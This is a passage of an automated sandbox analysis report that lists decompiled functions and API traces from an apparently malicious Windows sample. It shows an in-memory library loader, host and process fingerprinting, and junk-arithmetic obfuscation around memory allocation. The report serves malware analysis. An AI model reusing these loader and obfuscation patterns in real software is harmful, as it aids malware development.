GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00401165,?,00000000), ref: 00401DD6
IsWow64Process.KERNELBASE(0000008C,00000000,0000000C,?,?,00401165,?,00000000), ref: 00401DEE

Strings

KERNEL32.DLL, xrefs: 00401DC0
IsWow64Process, xrefs: 00401DCB

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHandleModuleProcProcessWow64
String ID: IsWow64Process$KERNEL32.DLL
API String ID: 1818662866-1193389583
Opcode ID: 705e8e67f85f64d29e37c7ea8968b63ce2edd5692bcb6fdcbfe67057fa657f0b
Instruction ID: 768899232a536f9eb576ec6d23ca53939a6d814219d7a5e069215039f3e37d53
Opcode Fuzzy Hash: 705e8e67f85f64d29e37c7ea8968b63ce2edd5692bcb6fdcbfe67057fa657f0b
Instruction Fuzzy Hash: D2F05E71910704EBDB40DBA4AE04BEB76F8EF44316B11017AEA09F3290E774EE409A5C

Function 002D102A, Relevance: 7.6, APIs: 5, Instructions: 56
memorylibraryloader

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002D1037
GetTickCount.KERNEL32 ref: 002D104E

Part of subcall function 002D39AB: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002D1061,?), ref: 002D39B3
Part of subcall function 002D39AB: GetVersion.KERNEL32 ref: 002D39C2
Part of subcall function 002D39AB: GetCurrentProcessId.KERNEL32 ref: 002D39D9
Part of subcall function 002D39AB: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002D39F6
Part of subcall function 002D39AB: GetLastError.KERNEL32 ref: 002D3A15

Part of subcall function 002D3B0F: lstrcpyn.KERNEL32(00000000,002DA284,00000008,00000000), ref: 002D3B34
Part of subcall function 002D3B0F: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 002D3BAC
Part of subcall function 002D3B0F: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 002D3BF5
Part of subcall function 002D3B0F: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 002D3C0E

GetModuleHandleA.KERNEL32(002DC09F,?,?,?), ref: 002D1089
GetProcAddress.KERNEL32(00000000,002DC8D6,?,?,?), ref: 002D109A
IsWow64Process.KERNELBASE(002DB208,?,?,?,?), ref: 002D10B2

Part of subcall function 002D1ECA: GetModuleHandleA.KERNEL32(002DC0EA), ref: 002D1ED5
Part of subcall function 002D1ECA: CoInitializeEx.OLE32(00000000,00000002), ref: 002D1F0C
Part of subcall function 002D1ECA: memset.NTDLL ref: 002D1FA7
Part of subcall function 002D1ECA: RtlInitializeCriticalSection.NTDLL(002DB29C), ref: 002D1FB8

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Process$CreateHandleInitializeModuleVirtual$AddressAllocCountCriticalCurrentErrorEventFreeHeapLastOpenProcSectionTickVersionWow64lstrcpynmemcpymemset
String ID:
API String ID: 2116652087-0
Opcode ID: ac3aa9f36e2d1d75f4e54b8cdec9973d6f0fb8a46685acac54687a069cbd3e53
Instruction ID: 5105787b374deee731210daf9d206e0ef6ec26b31b6e3ebc9d116b6f3dea671c
Opcode Fuzzy Hash: ac3aa9f36e2d1d75f4e54b8cdec9973d6f0fb8a46685acac54687a069cbd3e53
Instruction Fuzzy Hash: EE117331951246FBCB22AF61FC5CA6E7B65AB94792B208017FC04C6650D7718DB0CBA2

Function 0040FD83, Relevance: 7.6, APIs: 5, Instructions: 52
timethread

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040FDB8
GetCurrentProcessId.KERNEL32 ref: 0040FDC4
GetCurrentThreadId.KERNEL32 ref: 0040FDCC
GetTickCount.KERNEL32 ref: 0040FDD4
QueryPerformanceCounter.KERNEL32(?), ref: 0040FDE0

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
Instruction ID: 7599b5e67e7c0e06bf678f663d3460e7f34e71a3e9286964ff684c0be0f61bed
Opcode Fuzzy Hash: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
Instruction Fuzzy Hash: F3113372D002249BDB209BB8D94869FB7B8AF0C355F950572D901F7261D6749D0586D8

Function 0040FD83, Relevance: 7.6, APIs: 5, Instructions: 52
timethread

C-Code - Quality: 100%

			E0040FD83() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t24;
				signed int _t33;

				_t14 =  *0x42c4a0; // 0xe190ffa3
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12); // executed
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount(); // executed
					QueryPerformanceCounter( &_v20); // executed
					_t22 = _v16 ^ _v20.LowPart;
					_t33 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t33 != 0xbb40e64e) {
						if((0xffff0000 & _t33) == 0) {
							_t22 = _t33 << 0x10;
							_t33 = _t33 | _t22;
						}
					} else {
						_t33 = 0xbb40e64f;
					}
					 *0x42c4a0 = _t33;
					 *0x42c4a4 =  !_t33;
					return _t22;
				} else {
					_t24 =  !_t14;
					 *0x42c4a4 = _t24;
					return _t24;
				}
			}

0x0040fd89
0x0040fd8e
0x0040fd92
0x0040fda4
0x0040fdb8
0x0040fdc4
0x0040fdcc
0x0040fdd4
0x0040fde0
0x0040fde9
0x0040fdec
0x0040fdf0
0x0040fdfb
0x0040fdff
0x0040fe02
0x0040fe02
0x0040fdf2
0x0040fdf2
0x0040fdf2
0x0040fe04
0x0040fe0c
0x00000000
0x0040fdaa
0x0040fdaa
0x0040fdac
0x00000000
0x0040fdac

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040FDB8
GetCurrentProcessId.KERNEL32 ref: 0040FDC4
GetCurrentThreadId.KERNEL32 ref: 0040FDCC
GetTickCount.KERNEL32 ref: 0040FDD4
QueryPerformanceCounter.KERNEL32(?), ref: 0040FDE0

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
Instruction ID: 7599b5e67e7c0e06bf678f663d3460e7f34e71a3e9286964ff684c0be0f61bed
Opcode Fuzzy Hash: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
Instruction Fuzzy Hash: F3113372D002249BDB209BB8D94869FB7B8AF0C355F950572D901F7261D6749D0586D8

Function 00401000, Relevance: 7.5, APIs: 5, Instructions: 19
memory

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				struct HINSTANCE__* _t2;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x405440 = _t1;
				if(_t1 != 0) {
					_t2 = GetModuleHandleA(0); // executed
					 *0x405484 = _t2; // executed
					GetCommandLineW(); // executed
					_t4 = E004010ED(); // executed
					_t6 = _t4;
					HeapDestroy( *0x405440);
				}
				ExitProcess(_t6);
			}

0x00401001
0x0040100a
0x00401012
0x00401017
0x0040101a
0x00401020
0x00401025
0x0040102b
0x00401036
0x00401038
0x00401038
0x0040103f

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040100A
GetModuleHandleA.KERNELBASE(00000000), ref: 0040101A
GetCommandLineW.KERNELBASE ref: 00401025

Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401118
Part of subcall function 004010ED: WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401134
Part of subcall function 004010ED: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
Part of subcall function 004010ED: wsprintfW.USER32 ref: 0040123B
Part of subcall function 004010ED: lstrlenW.KERNEL32(?), ref: 0040124F
Part of subcall function 004010ED: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
Part of subcall function 004010ED: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
Part of subcall function 004010ED: lstrcpyW.KERNEL32(00000000), ref: 00401283
Part of subcall function 004010ED: UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
Part of subcall function 004010ED: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
Part of subcall function 004010ED: GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD
Part of subcall function 004010ED: GetLastError.KERNEL32(?,00000000), ref: 004012E5

HeapDestroy.KERNEL32 ref: 00401038
ExitProcess.KERNEL32 ref: 0040103F

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CurrentFile$CreateCursorHeapProcessThreadView$CommandDestroyErrorExitHandleLastLineMappingModuleObjectSingleUnmapWaitlstrcpylstrlenwsprintf
String ID:
API String ID: 1825853680-0
Opcode ID: 46997d1b3fa60607fb4d967d660b9805b514087fefde80263f9ad736616b84e5
Instruction ID: 3660558e5181c470f1db29b591f8313a66fca8dcae8bfb226ac8d0b8d28842ce
Opcode Fuzzy Hash: 46997d1b3fa60607fb4d967d660b9805b514087fefde80263f9ad736616b84e5
Instruction Fuzzy Hash: 4CE0B6B18016209BC7212BB1BF0CB8B3E69FB4535AB000135F705F2170CB3844808FAD

Function 0040009E, Relevance: 7.3, APIs: 4, Instructions: 1345
memory

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000), ref: 0040101A
GetCommandLineW.KERNELBASE ref: 00401025

Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401118
Part of subcall function 004010ED: WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401134
Part of subcall function 004010ED: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
Part of subcall function 004010ED: wsprintfW.USER32 ref: 0040123B
Part of subcall function 004010ED: lstrlenW.KERNEL32(?), ref: 0040124F
Part of subcall function 004010ED: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
Part of subcall function 004010ED: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
Part of subcall function 004010ED: lstrcpyW.KERNEL32(00000000), ref: 00401283
Part of subcall function 004010ED: UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
Part of subcall function 004010ED: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
Part of subcall function 004010ED: GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD
Part of subcall function 004010ED: GetLastError.KERNEL32(?,00000000), ref: 004012E5

HeapDestroy.KERNEL32 ref: 00401038
ExitProcess.KERNEL32 ref: 0040103F

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CurrentFile$CursorProcessThreadView$CommandCreateDestroyErrorExitHandleHeapLastLineMappingModuleObjectSingleUnmapWaitlstrcpylstrlenwsprintf
String ID:
API String ID: 3328684964-0
Opcode ID: 4cab8bfa91b30c5f08ef29135326620567db0eab0d43e2b5cf40167085a431bb
Instruction ID: e7986d4482a50aa81d5ba86c80f45fdd99c21c801ab98a1a08adee72aeaa991a
Opcode Fuzzy Hash: 4cab8bfa91b30c5f08ef29135326620567db0eab0d43e2b5cf40167085a431bb
Instruction Fuzzy Hash: 939174A284E3C00FDB13977129646957F71AE53285B0E41EBC485EF4E3D22D488ED76B

Function 00411650, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
libraryloader

C-Code - Quality: 53%

			E00411650(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t16;
				struct HINSTANCE__* _t18;
				_Unknown_base(*)()* _t19;
				intOrPtr _t23;
				_Unknown_base(*)()* _t29;
				void* _t30;

				_push(0x14);
				_push(0x418e00);
				E0040D48C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t30 - 0x1c)) = 0;
				_t29 = E0040F8BC( *0x4366c4);
				if(_t29 == 0) {
					_t16 = E0040CE99(_t30 - 0x1c);
					_pop(_t23);
					_t35 = _t16;
					if(_t16 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0040CA26(__ebx, _t23, __edx, 0, _t35);
					}
					if( *((intOrPtr*)(_t30 - 0x1c)) == 1) {
						L6:
						_t29 = E00411640;
					} else {
						_t18 = GetModuleHandleA("kernel32.dll"); // executed
						if(_t18 == 0) {
							goto L6;
						} else {
							_t19 = GetProcAddress(_t18, "InitializeCriticalSectionAndSpinCount"); // executed
							_t29 = _t19;
							if(_t29 == 0) {
								goto L6;
							}
						}
					}
					 *0x4366c4 = E0040F850(_t29);
				}
				 *((intOrPtr*)(_t30 - 4)) = 0;
				 *((intOrPtr*)(_t30 - 0x20)) =  *_t29( *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));
				 *((intOrPtr*)(_t30 - 4)) = 0xfffffffe;
				return E0040D4D1( *((intOrPtr*)(_t30 - 0x20)));
			}

0x00411650
0x00411652
0x00411657
0x0041165e
0x0041166d
0x00411671
0x00411677
0x0041167c
0x0041167d
0x0041167f
0x00411681
0x00411682
0x00411683
0x00411684
0x00411685
0x00411686
0x0041168b
0x00411692
0x004116b5
0x004116b5
0x00411694
0x00411699
0x004116a1
0x00000000
0x004116a3
0x004116a9
0x004116af
0x004116b3
0x00000000
0x00000000
0x004116b3
0x004116a1
0x004116c1
0x004116c1
0x004116c6
0x004116d1
0x00411705
0x00411714

APIs

Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913

GetModuleHandleA.KERNELBASE(kernel32.dll,00000014,0040D3F9,00000000,00000FA0,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 00411699
GetProcAddress.KERNELBASE(00000000,InitializeCriticalSectionAndSpinCount,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000), ref: 004116A9

Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7

Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06

Strings

kernel32.dll, xrefs: 00411694
InitializeCriticalSectionAndSpinCount, xrefs: 004116A3

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Value$AddressHandleModuleProc$ExceptionFilterPointerProcessUnhandled$CurrentDebuggerDecodeEncodePresentTerminate
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3978095639-3733552308
Opcode ID: c4ba39d00cd69071d496a3caa1a9ff85372b94adc1c16ef2ffb4e544e1077159
Instruction ID: 10b67c62758283e54975a8c2a8718c2afbb13bd149e7d6db9f50ab6a7734c4d0
Opcode Fuzzy Hash: c4ba39d00cd69071d496a3caa1a9ff85372b94adc1c16ef2ffb4e544e1077159
Instruction Fuzzy Hash: 3901D872D00215ABCB21BF75DC459DE7A71AB44310715827BF515B33B1EB3D49818A6C

Function 0040E1B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloader

C-Code - Quality: 65%

			E0040E1B8() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32"); // executed
				if(_t8 == 0) {
					L6:
					_v20 =  *0x417a50;
					_v28 =  *0x417a48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent"); // executed
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0040e1bd
0x0040e1c5
0x0040e1dc
0x0040e188
0x0040e191
0x0040e19d
0x0040e1a0
0x0040e1a3
0x0040e1a5
0x0040e1a8
0x0040e1ad
0x0040e1b7
0x0040e1af
0x0040e1b3
0x0040e1b3
0x0040e1c7
0x0040e1cd
0x0040e1d5
0x00000000
0x0040e1d7
0x0040e1d7
0x0040e1db
0x0040e1db
0x0040e1d5

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040C672), ref: 0040E1BD
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040E1CD

Strings

KERNEL32, xrefs: 0040E1B8
IsProcessorFeaturePresent, xrefs: 0040E1C7

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
Instruction ID: 81a772609b1be3753ee91d77cf381401c8db6a6cdce0ee8bcfb7c7911c54f1bb
Opcode Fuzzy Hash: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
Instruction Fuzzy Hash: 8AC012307CC302AADA102BB20C09B9BB9782F09B82F208C726909E91C1CA7CC120816D

Function 002D52D0, Relevance: 6.1, APIs: 4, Instructions: 148memory

APIs

SysAllocString.OLEAUT32(?), ref: 002D5311
SysFreeString.OLEAUT32(?), ref: 002D53E5

Part of subcall function 002D50FB: SysAllocString.OLEAUT32(002DA298), ref: 002D5143
Part of subcall function 002D50FB: lstrcmpW.KERNEL32(00000000,002DC068), ref: 002D5212

Part of subcall function 002D503C: Sleep.KERNEL32(000000C8), ref: 002D506A
Part of subcall function 002D503C: lstrlenW.KERNEL32(?), ref: 002D50A0
Part of subcall function 002D503C: memcpy.NTDLL(00000000,?,?,?), ref: 002D50C1
Part of subcall function 002D503C: SysFreeString.OLEAUT32(?), ref: 002D50D5

SafeArrayDestroy.OLEAUT32(?), ref: 002D5439
SysFreeString.OLEAUT32(?), ref: 002D5447

Part of subcall function 002D5273: Sleep.KERNELBASE(000001F4), ref: 002D52B8

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: String$Free$AllocSleep$ArrayDestroySafelstrcmplstrlenmemcpy
String ID:
API String ID: 4134243222-0
Opcode ID: c945c3e9ff48ddf0d8783393798eb97caf344694bb1657d9db19f42877c480ff
Instruction ID: b288aaaf5e6d555cd4015589b95bde5cec31add50da07ef7cc3bb08b7dd4aa47
Opcode Fuzzy Hash: c945c3e9ff48ddf0d8783393798eb97caf344694bb1657d9db19f42877c480ff
Instruction Fuzzy Hash: AE51503691061AEFCB10DFE4D8849AEB7B6FF88341B14886AE501EB320D7B19D55CF51

Function 002D1ECA, Relevance: 6.1, APIs: 4, Instructions: 109

APIs

GetModuleHandleA.KERNEL32(002DC0EA), ref: 002D1ED5
CoInitializeEx.OLE32(00000000,00000002), ref: 002D1F0C

Part of subcall function 002D4C8B: GetVersionExA.KERNEL32(?), ref: 002D4CA4
Part of subcall function 002D4C8B: wsprintfA.USER32 ref: 002D4D08

Part of subcall function 002D4615: NtOpenProcess.NTDLL(00000000,00000400,?,002D1F56), ref: 002D465C
Part of subcall function 002D4615: NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 002D466F
Part of subcall function 002D4615: memcpy.NTDLL(00000000,00000000,0000001C), ref: 002D46B5
Part of subcall function 002D4615: NtClose.NTDLL(?), ref: 002D46C7
Part of subcall function 002D4615: NtClose.NTDLL(00000000), ref: 002D46D1

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

memset.NTDLL ref: 002D1FA7
RtlInitializeCriticalSection.NTDLL(002DB29C), ref: 002D1FB8

Part of subcall function 002D46DF: RtlAllocateHeap.NTDLL(00000000,?), ref: 002D471C
Part of subcall function 002D46DF: HeapFree.KERNEL32(00000000,00000000), ref: 002D474D
Part of subcall function 002D46DF: GetComputerNameW.KERNEL32(00000000,?), ref: 002D475B
Part of subcall function 002D46DF: RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4772
Part of subcall function 002D46DF: GetComputerNameW.KERNEL32(00000000,?), ref: 002D4783
Part of subcall function 002D46DF: HeapFree.KERNEL32(00000000,00000000), ref: 002D47A4

Part of subcall function 002D1173: HeapFree.KERNEL32(00000000,?,00000000), ref: 002D1336

Part of subcall function 002D1D31: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 002D1D52
Part of subcall function 002D1D31: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1DA7
Part of subcall function 002D1D31: HeapFree.KERNEL32(00000000,?), ref: 002D1E22
Part of subcall function 002D1D31: CloseHandle.KERNEL32(?), ref: 002D1E32
Part of subcall function 002D1D31: _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 002D1E7E
Part of subcall function 002D1D31: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1EA4
Part of subcall function 002D1D31: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D1FF0,00000058,00000000), ref: 002D1EB9

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$Free$AllocateClose$ComputerHandleInitializeMultipleNameObjectsOpenProcessWait$CreateCriticalErrorLastModuleSectionTimerTokenVersionWaitable_allmulmemcpymemsetwsprintf
String ID:
API String ID: 3223691794-0
Opcode ID: 9def78826ac54dacfc49cd4be8beab93feb854996bc4f1a8bbd402b7b3358413
Instruction ID: 9daf09b8d5eae4b1298c62847519a61f5b8048759fb0c439cc66d8bee7b8a49a
Opcode Fuzzy Hash: 9def78826ac54dacfc49cd4be8beab93feb854996bc4f1a8bbd402b7b3358413
Instruction Fuzzy Hash: 60310372E31312AFDB219F68AC19B3D37A4AB05781F15012BE941E6B90E7B0CC34CB90

Function 004046A0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 81
memory

C-Code - Quality: 100%

			E004046A0(long _a4) {
				signed char _v5;
				intOrPtr _v12;
				intOrPtr _v20;
				short _v32;
				char _v34;
				intOrPtr* _v40;
				signed short _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v80;
				short _v88;
				short _v112;
				intOrPtr _v120;
				long _v132;
				char _v137;
				signed short _v144;
				char _v149;
				intOrPtr _v156;
				signed char _v157;
				short _v168;
				intOrPtr _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v192;
				intOrPtr _v196;
				char _v201;
				intOrPtr _v208;
				intOrPtr _v212;
				signed int _v224;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v245;
				signed int _v252;
				intOrPtr _v256;
				void* _t63;

				_v112 = 0xa;
				_v157 = 0x21;
				_v88 = 0x1d;
				_v201 = 0x13;
				_v224 = 0x11;
				_v44 = 0x2d;
				_v32 = 0x26;
				_v168 = _v196 + 0x00000058 & _v252 ^ _v144 & 0x0000ffff;
				_v149 = 0x21 - _v180 + 0x1d;
				_v40 =  &_v176;
				_v80 = _v20 + _v236;
				 *_v40 = _v256;
				_v137 = 0x00000031 - (_v5 & 0x000000ff) & _v172 - _v196 + _v156;
				_v132 = _a4;
				_v60 = _v192 + 0x45;
				if(_v208 == 0x1d) {
					_v44 = 0x5b - _v56;
					_v224 = _v212 + 0x0000000f - _v240 & _v224;
				}
				_v34 = 0x00000018 - _v12 ^ 0xfffffffd;
				_v245 = _v236 +  *0x436050 & _v64 + 0x0000003c & _v192;
				_t63 = VirtualAlloc(0, _v132, 0x1000, 4); // executed
				 *0x42d028 = _t63;
				_v120 = _v60 - (_v44 & 0x0000ffff) + (_v157 & 0x000000ff);
				_v172 = 0x3a;
				return 0x3a - _v172;
			}

0x004046a9
0x004046af
0x004046b6
0x004046bc
0x004046c3
0x004046cd
0x004046d3
0x004046f1
0x00404706
0x00404712
0x0040471e
0x0040472a
0x0040474b
0x00404754
0x00404760
0x0040476a
0x00404774
0x0040478d
0x0040478d
0x0040479e
0x004047bb
0x004047ce
0x004047d4
0x004047eb
0x004047f9
0x00404802

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004047CE

Strings

-, xrefs: 004046CD
&, xrefs: 004046D3
!, xrefs: 004046AF

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

